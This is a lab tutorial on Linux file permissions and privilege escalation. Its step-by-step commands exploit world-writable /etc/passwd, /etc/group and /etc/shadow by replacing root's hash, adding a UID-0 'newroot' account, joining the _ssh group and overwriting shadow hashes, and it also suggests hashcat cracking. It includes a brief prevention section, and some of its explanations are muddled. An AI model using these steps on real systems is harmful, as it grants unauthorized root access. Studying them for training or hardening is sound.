From Linux Permissions Introduction to Privilege Escalation Attacks (Exploiting Bad Permissions)
Table of Contents
- Privilege Escalation (chmod)
- Understanding Permissions
- Privilege Escalation (chmod)
- Exploiting Bad Permissions on passwd
- Another Way to Exploit passwd
- How to Stop It?
- Challenge
- Group File Introduction
- Exploiting Bad Permissions on Group File
- How to Find 777
- RWXRWXRWX /etc/shadow
- References
Privilege Escalation
To understand the fundamental offensive security concept of privilege escalation attacks, we will start with basic elements of Linux permissions.
Privilege escalation attacks refer to attempts by an attacker to gain unauthorized access or escalate their access rights beyond those granted to them.
The following summary includes commands that may contain exploits, so use caution depending on your environment.
Understanding Permissions
Look at the part -rw-r--r--
└─$ ls -l /etc/passwd
-rw-r--r-- 1 root root 3159 Nov 25 13:27 /etc/passwd
The meaning is:
- The user has
permissions. - The group and world have
permission only.
The meanings of r
and w
are as shown in the image below:
To summarize:
- Administrator categories:
- Owner permission (User)
- Group permission (Group)
- Other users’ permission (World)
- Types of permissions:
- Read permission (r)
- Write permission (w)
- Execute permission (x)
So, when looking at the initial command line, we can see that the User has read
and write
permissions, while the Group and World have read
permission only.
Privilege Escalation (chmod)
To escalate privileges, you need to use chmod
The strongest permission setting with chmod
is chmod 777
This command gives read, write, and execute permissions to the owner, group, and all users for the file or directory.
The number 7 is equivalent to binary 111
, meaning that read (4), write (2), and execute (1) permissions are all granted.
└─$ sudo chmod 777 /etc/passwd
└─$ ls -l /etc/passwd
-rwxrwxrwx 1 root root 3159 Nov 25 13:27 /etc/passwd
You can also display the permissions in octal notation.
Reference Article
The following section is a rough translation from Linux Privilege Escalation Examples From Zero to Hero - OSCP.
If you know basic Linux commands, it should be easy to understand.
If you try this, it’s better to set up a virtual environment like a hacking lab (Linux, Ubuntu, Kali, or any environment, but the output of commands may differ depending on the environment. I set up a Kali Server).
SSH Flow
- [On Kali Linux]
sudo systemctl start ssh
- [On Kali Linux]
sudo systemctl enable ssh
- [On Kali Linux] Check the IP address with
(something like - [On Mac]
(Do not use root for this). - [On Mac] You will be prompted for a password; enter the Kali Linux password.
- [On Mac] If it’s the first time, you’ll be asked, “The authenticity of host ‘ (’ can’t be established.” Type
. - [On Mac] Once you see the Kali Linux prompt, you’re done.
Exploiting Bad Permissions on passwd
“Exploiting Invalid Permissions on Password”
Here, ocat
has root privileges, but this example will show privilege escalation from a user who does not have root access.
# Create a user called 'user'
sudo useradd user
# Set a password for 'user'
sudo passwd user
ls -l /etc/passwd
-rw-r--r-- 1 root root 3409 Dec 14 09:20 /etc/passwd
# The above permissions are weak, so we escalate them
sudo chmod 777 /etc/passwd
ls -l /etc/passwd
-rwxrwxrwx 1 root root 3409 Dec 14 09:20 /etc/passwd
# Now, with full permissions, let's change the root password
# First, generate the password
openssl passwd hacked123
# Edit the passwd file
vi /etc/passwd
# Change root:x:0:0:root:/root:/usr/bin/zsh to
# root:$1$WZv9DkcY$miAFvpNYY/pNLrSvkEZv0.:0:0:root:/root:/usr/bin/zsh
# Save and login
su root
Another Way to Exploit passwd
“Other Ways to Exploit Passwords”
In this method, you will log in as newocat
and newroot
, but you’ll mainly use the profiles of ocat
and root
# Login as user
su user
# Verify you're user
# Generate password
openssl passwd 123456
cat /etc/passwd | grep ocat
# ocat:x:1000:1000:koki oka,,,:/home/ocat:/usr/bin/zsh
vi /etc/passwd
# Add newocat, newroot entries
# newocat:$1$iDaiqw3L$eJhRFa1syijyRR0SugGP70:1000:1000:koki oka,,,:/home/ocat:/usr/bin/zsh
# newroot:$1$iDaiqw3L$eJhRFa1syijyRR0SugGP70:0:0:root:/root:/usr/bin/zsh
# Login as newocat
su newocat
# Verify it's ocat
# Login as newroot
su newroot
# Verify it's root
How to Stop It?
“How to Prevent Privilege Escalation”
In this case, we give 644 permissions.
chmod 644 /etc/passwd
su user
ls -l /etc/passwd
# When you try editing with vi, it will show `readonly`.
“How to Create an Intermediate User”
An intermediate user has higher privileges than a normal user but not full root privileges.
Currently, ocat
has user management privileges (root).
└─$ ls -l /etc/passwd
-rw-r--r-- 1 root root 3409 Dec 17 15:41 /etc/passwd
The /etc/passwd
file has read access.
We need to create a group file instead of passwd
sudo chmod 777 /etc/group
Now, this permission is changed to allow read, write, and execute access for everyone.
ls -l /etc/group
-rwxrwxrwx 1 root root 1278 Nov 25 13:27 /etc/group
Now, let’s log in as the user.
# Log in
su user
# Verify
groups ocat
ocat : ocat adm dialout cdrom floppy sudo audio dip video plugdev users netdev wireshark bluetooth scanner kaboxer
Group File Introduction
“What is a Group File?”
On Linux and Unix OS, users can be classified into groups.
Each line in the file contains one entry.
- Actual code:
- cdrom:x:24:vivek,student13,raj
- Code meaning:
- Group name : Password : Group ID : Group list
The group list shows the users who are members of the group.
If a user has read and write access to this file, they can add users to the group.
Exploiting Bad Permissions on Group File
“Exploiting Invalid Permissions on Group File”
Currently, the group file has bad permissions, so we will exploit this by adding the user suzuki
# Check permissions on /etc/group
ls -l /etc/group
-rw-rw-r-- 1 root root 1278 Nov 25 13:27 /etc/group
# Escalate permissions
sudo chmod 777 /etc/group
[sudo] password for ocat:
ls -l /etc/group
-rwxrwxrwx 1 root root 1278 Nov 25 13:27 /etc/group
# Add user suzuki
sudo adduser suzuki
info: Adding user `suzuki' ...
info: Selecting UID/GID from range 1000 to 59999 ...
info: Adding new group `suzuki' (1002) ...
info: Adding new user `suzuki' (1002) with group `suzuki (1002)` ...
info: Creating home directory `/home/suzuki` ...
info: Copying files from `/etc/skel` ...
New password:
Retype new password:
passwd: password updated successfully
Changing the user information for suzuki
Enter the new value, or press ENTER for the default
Full Name []: suzuki test
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] y
info: Adding new user `suzuki` to supplemental / extra groups `users` ...
info: Adding user `suzuki` to group `users` ...
# Log in as suzuki
su suzuki
# In home
cd ~
# Verify it's suzuki
# Check suzuki's groups
groups suzuki
suzuki : suzuki users
# Check /etc/group permissions for suzuki
ls -l /etc/group
-rw-rw-r-- 1 root root 1300 Dec 14 09:20 /etc/group
# Log in as ocat again
su ocat
# Escalate /etc/group permissions
sudo chmod 777 /etc/group
# Log in as suzuki again
su suzuki
# Confirm escalated permissions
ls -l /etc/group
-rwxrwxrwx 1 root root 1300 Dec 14 09:20 /etc/group
# Add suzuki to _ssh
vi /etc/group
# ...
# _ssh:x:113:suzuki
# ...
Exit all users first.
Then log in via SSH as suzuki.
# It's faster to restart the terminal
Now you can SSH into the system as suzuki
From here, you can add suzuki
to many groups for further privilege escalation.
How to Find 777
“How to Find Files with Permissions”
Now logged in as suzuki:
groups suzuki
suzuki : suzuki users _ssh
Since suzuki is in the ssh group, SSH access is possible.
To find executable files, run the following command (search any file directory).
find / -type f -perm 777
If you encounter errors or access is denied, you need to handle those permissions using the above commands.
Try the following on /tmp/null
find / -type f -perm 777 2>/tmp/null
-bash: /tmp/null: Permission denied
# Try various approaches
find / -type f -perm 777 2>/
-bash: /: Is a directory
find / -type f -perm 777 2>/home
-bash: /home: Is a directory
find / -type f -perm 777 2>/home/suzuki/
-bash: /home/suzuki/: Is a directory
find / -type f -perm 777 2>
-bash: syntax error near unexpected token `newline'
It seems suzuki
doesn’t have bash, so to move forward, create a new file:
# Create a file
touch /home/suzuki/null
# Check
ls /home/suzuki/
# Verify permissions
# If it's not -rw-rw-r--, adjust permissions
ls -l /home/suzuki
-rw-rw-r-- 1 suzuki suzuki 163502 Dec 17 10:19 null
# Look for 777 permissions
find / -type f -perm 777 2>/home/suzuki/null
Passwords used for Linux user logins are stored in /etc/shadow
Lastly, check the permissions of /etc/shadow
and /etc/group
ls -l /etc/shadow
-rwxrwxrwx 1 root shadow 1583 Dec 14 09:19 /etc/shadow
ls -l /etc/group
-rwxrwxrwx 1 root root 1324 Dec 17 10:14 /etc/group
RWXRWXRWX /etc/shadow
Here, we will escalate privileges on /etc/shadow
The ultimate goal is to change ocat
’s password and root
’s password.
First, check the contents of /etc/shadow
cat /etc/shadow
# You should see the hashed passwords.
Create the password with openssl
openssl passwd hacked123
Once created, replace the hash in /etc/shadow
for ocat:xxxxxx…
with the new hash.
vi /etc/shadow
su ocat
# login done
Then try the same with root.
su root
# root
This is the first time you gain root privileges.
Additionally, a more advanced action would be to use tools like hashcat to crack the hash if you can view it.
A useful website for hash identification is:
- [Udemy] Linux Privilege Escalation For The OSCP Training
- Linux permissions and octal, why do you say 775 or 600?